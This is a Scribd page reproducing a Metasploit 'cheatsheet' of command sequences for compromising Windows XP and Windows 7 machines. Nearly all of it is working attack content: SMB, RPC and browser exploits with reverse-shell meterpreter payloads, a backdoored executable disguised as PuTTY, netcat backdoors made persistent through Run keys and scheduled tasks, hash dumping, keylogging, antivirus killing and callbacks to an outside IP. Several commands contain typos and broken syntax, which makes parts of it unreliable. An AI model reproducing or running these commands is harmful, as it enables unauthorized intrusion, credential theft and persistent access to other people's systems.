[go: up one dir, main page]
Scribd
Upload
386 views7 pages

!!!METASPLOIT!!!

This document provides a cheat sheet of commands for hacking Windows systems using Metasploit. It lists 12 examples of Metasploit commands that target vulnerabilities in Windows XP, Windows 7, and other versions to gain remote access or escalate privileges. The commands demonstrate exploiting SMB, RPC, and browser vulnerabilities to establish reverse shells and meterpreter sessions, and then using post-exploitation techniques like privilege escalation, credential dumping, and installing backdoors.

Uploaded by

Tigrex22
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
386 views7 pages

!!!METASPLOIT!!!

This document provides a cheat sheet of commands for hacking Windows systems using Metasploit. It lists 12 examples of Metasploit commands that target vulnerabilities in Windows XP, Windows 7, and other versions to gain remote access or escalate privileges. The commands demonstrate exploiting SMB, RPC, and browser vulnerabilities to establish reverse shells and meterpreter sessions, and then using post-exploitation techniques like privilege escalation, credential dumping, and installing backdoors.

Uploaded by

Tigrex22
Copyright
© Attribution Non-Commercial (BY-NC)
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 7

METASPLOIT CHEATSHEET

Commands Only (Not for Script Kiddies):


1Hacking Windows XP with Metasploit tutorial - VNC remote control
use windows/smb/ms08_067_netapi
show optios
set RHOST 192.168.1.1
set payload windows/vncinject/bind_tcp
exploit
2.Metasploit vs Windows 7 and AVG
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOT 192.168.1.10
set LPORT 5555
exploit
ps
migrate 1880
cd c:\ ls
download program-7.exe /root
run killav
shell
3. Hacking By Metasploit . Windows xp Sp3 . With B14CK_B34RD
use windows/smb/ms08_067_netapi
set LHOST 192.168.1.10
set RHOST 192.168.1.1
set payload windows/meterpreter/reverse_tcp
exploit
4.hacking win7 with metasploit
nmap -sS -v -PN 192.168.1-255
use exploit/multi/handler
set LHOST 192.168.1.10
set LPORT 5555
set payload windows/meterpreter/reverse_tcp
show optios
set EndOnSession false
show optios
set RHOST 192.168.1.1
set RPORT 4321
show options
exploit
5. Metasploit --- Explotando vulnerabilidad en Windows 7
sudo nmap 192.168.---cek target dengan nmap------>445/tcp_open microsoft-ds
use auxiliary/dos/windows/smb/smb2_negotiate_pidhigh
set RHOST 192.168.1.1
set RPORT 445
run ----run the exploit
6. Metasploit backdooring

msf3#./msfpayloa windows/meterpreter/reverse_tcp LHOST=192.168.1.1 R |./msfconso


le -t
exe -x /tmp/kislay.exe -k -o /tmp/putty_pro.exe -e x86/shikata_ga_nai -c 5
root@b14ck# cd /tmp---->kislay.exe
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.10
show options
exploit
Meterpretr>
?
getuid
use priv
hashdump
keyscan_start
keyscan_dump
sysinfo
msg * ------->msg displayed on the screen
7. ms10 025 metasploit exploitation
nmap -O 192.168.1.7-----see the target operating system
search ms10
use exploit windows/mmsp/ms10_25_wmss_connect_funnel
set payload windows/shell_bind_tcp
show options
set RHOST 192.168.1.1
exploit
8. IEPeers: ms10_08_ie_behaviors Exploit
search iepeers
use windows/browser/ms10_018_ie_behaviors
set PAYLOAD windows/exec
show options
set SRVHOST 192.168.1.1
set URIPATH /
set CMD calc.exe
set target 1
info---->Available targets ;1 IE 6 spo-sp2 (onclick)
exploit
using url: http://192.168.1.1:8080/
open the browser mozilla or whatever browser used
type: http://192.168.1.1:8080/---enter
wait a few moments...
9. metasploit rpc_dum
nmap -sS 192.168...
135/TCP open
use msrpc_dcom_ms03_026
set payload win32_reverse_meterpreter
show options
set RHOST 192.168.1.1
set LHOST 192.168.1.10
exploit
help
use -m process
execute -f cmd.exe -c

interact 1
c:\winnt\system32\>dir
10.Uploading A Backdoor Metasploit Netcat
meterpreter> upload netcat.exe c:\\WINDOWS\\SYSTEM32\\
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\
Run
meterpreter> reg setval -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\R
un -v windows live -d "c:\\WINDOWS\\SYSTEM32\\netcat.exe -L -d -p 5555 -e cmd.ex
e
meterpreter> reg enumkey -k HKLM\\software\\Microsoft\\Windows\\CureentVersion\\
Run
meterpreter> reboot
bt~# nc 192.168.1.1 5555
11. BackTrack 4 R1 Metasploit 3 & SET, Hacking Windows 7
cd /pentest/exploits/SET
./set
Enter you choice: 4
enter the ip addres : 192.168.1.1
enter chose ( hit enter for default): 2
enter chose ( hit enter for default):16
set port 4444
open Konqueror /pentest/exploits/SET/
media/sda3---------->msf.exe
cd /pentest/exploits/SET# cd ..
/pentest/exploits# cd framework3
./msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168..
set lport 4444
exploit
use priv
help
excecute -f cmd
ipconfig
shell
screenhot
excecute -f explorer
12. ms067 + netcat backdoor
use windows/smb/ms08_067_netapi
set payload windows/meterpreter/reverse_tcp
set RHOST
set LHOST
exploit
upload /root/nc.exe c:\\WINDOWS\\SYSTEM32\\
MORE Advanced Phun:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST rmccurdy.com
set LPORT 21
set ExitOnSession false
# set AutoRunScript pathto script you want to autorun after exploit is run

set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30


exploit -j -z
____________________________________________________________________
# file_autopwn
rm -Rf /tmp/1
mkdir /tmp/1
rm -Rf ~/.msf3
wget -O /tmp/file3.pdf https://www1.nga.mil/Newsroom/PressR...s/nga10_02.pdf
./msfconsole
db_driver sqlite3
db_create pentest11
setg LHOST 75.139.158.51
setg LPORT 21
setg SRVPORT 21
setg LPORT_WIN32 21
setg INFILENAME /tmp/file3.pdf
use auxiliary/server/file_autopwn
set OUTPATH /tmp/1
set URIPATH /msf
set SSL true
set ExitOnSession false
set PAYLOAD windows/meterpreter/reverse_tcp
setg PAYLOAD windows/meterpreter/reverse_tcp
set AutoRunScript persistence -r 75.139.158.51 -p 21 -A -X -i 30
run
________________________________________________________________________
# shows all the scripts
run [tab]
________________________________________________________________________
# persistence! broken ...if you use DNS name ..
run persistence -r 75.139.158.51 -p 21 -A -X -i 30
________________________________________________________________________
run get_pidgin_creds
idletime
sysinfo
________________________________________________________________________
# SYSTEM SHELL ( pick a proc that is run by system )
migrate 376
shell

________________________________________________________________________
# session hijack tokens
use incognito
impersonate_token "NT AUTHORITY\\SYSTEM"
________________________________________________________________________
# escalate to system
use priv
getsystem
________________________________________________________________________
execute -f cmd.exe -H -c -i -t
execute -f cmd.exe -i -t
________________________________________________________________________
# list top used apps
run prefetchtool -x 20
________________________________________________________________________
# list installed apps
run prefetchtool -p
________________________________________________________________________
run get_local_subnets
________________________________________________________________________
# find and download files
run search_dwld "%USERPROFILE%\\my documents" passwd
run search_dwld "%USERPROFILE%\\desktop passwd
run search_dwld "%USERPROFILE%\\my documents" office
run search_dwld "%USERPROFILE%\\desktop" office
________________________________________________________________________
# alternate
download -r "%USERPROFILE%\\desktop" ~/
download -r "%USERPROFILE%\\my documents" ~/
________________________________________________________________________
# alternate to shell not SYSTEM
# execute -f cmd.exe -H -c -i -t
________________________________________________________________________
# does some run wmic commands etc
run winenum
________________________________________________________________________
# rev shell the hard way
run scheduleme -m 1 -u /tmp/nc.exe -o "-e cmd.exe -L -p 8080"
________________________________________________________________________
# An example of a run of the file to download via tftp of Netcat and then runnin
g it as a backdoor.
run schtasksabuse-dev -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p
8080 -e cmd.exe" -d 4
run schtasksabuse -t 192.168.1.7 -c "tftp -i 192.168.1.8 GET nc.exe,nc -L -p 808
0 -e cmd.exe" -d 4
________________________________________________________________________
# vnc / port fwd for linux
run vnc
________________________________________________________________________
# priv esc

run kitrap0d
________________________________________________________________________
run getgui
________________________________________________________________________
# somewhat broken .. google sdt cleaner NtTerminateProcess !@?!?!
run killav
run winemun
run memdump
run screen_unlock
_________________________________________________________________________
upload /tmp/system32.exe C:\\windows\\system32\\
reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion \\run
reg setval -k HKLM\\software\\microsoft\\windows\\currentversion \\run -v system
32 -d "C:\\windows\\system32\\system32.exe -Ldp 455 -e cmd.exe"
reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion \\Run -v syst
em32
reg enumkey -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\
firewallpolicy\\Standardprofile\\aut horizedapplications\\list
reg setval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\\f
irewallpolicy\\Standardprofile\\aut horizedapplications\\list -v sys
reg queryval -k HKLM\\system\\controlset001\services\\sharedaccess \\parameters\
\firewallpolicy\\Standardprofile\\aut horizedapplications\\list -v system32
upload /neo/wallpaper1.bmp "C:\\documents and settings\\pentest3\\local settings
\\application data\\microsoft\\"
__________________________________________________________________________
getuid
ps
getpid
keyscan_start
keyscan_dump
migrate 520
portfwd add -L 104.4.4 -l 6666 -r 192.168.1.1 -p 80"
portfwd add -L 192.168.1.1 -l -r 10.5.5.5 -p 6666
___________________________________________________________________________
shell
run myremotefileserver_mserver -h
run myremotefileserver_mserver -p 8787
___________________________________________________________________________
run msf_bind
run msf_bind -p 1975
rev2self
getuid
___________________________________________________________________________
getuid

enumdesktops
grabdesktop
run deploymsf -f framework-3.3-dev.exe

run
run
run
run
run
run
run
run
run

hashdump
metsvc
scraper
checkvm
keylogrecorder
netenum -fl -hl localhostlist.txt -d google.com
netenum -rl -r 10.192.0.50-10.192.0.254
netenum -st -d google.com
netenum -ps -r 10.192.0.50-254

________________________________________________________________________
# Windows Login Brute Force Meterpreter Script
run winbf -h
________________________________________________________________________
# upload a script or executable and run it
uploadexec
________________________________________________________________________
# Using Payload As A Backdoor from a shell
REG add HKEY_CURRENT_USER\Software\Microsoft\Windows\Curre ntVersion\Run /v fire
wall /t REG_SZ /d "c:\windows\system32\metabkdr.exe" /f
at 19:00 /every:M,T,W,Th,F cmd /c start "%USERPROFILE%\metabkdr.exe"
SCHTASKS /Create /RU "SYSTEM" /SC MINUTE /MO 45 /TN FIREWALL /TR "%USERPROFILE%\
metabkdr.exe" /ED 11/11/2011
_________________________________________________________________________
# kill AV this will not unload it from mem it needs reboot or kill from memory s
till ... Darkspy, Seem, Icesword GUI can kill the tasks
catchme.exe -K "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -E "c:\Program Files\Kaspersky\avp.exe"
catchme.exe -O "c:\Program Files\Kaspersky\avp.exe" dummy
__________________________________________________________________________
email me@ pris@tyrellcorp.net

You might also like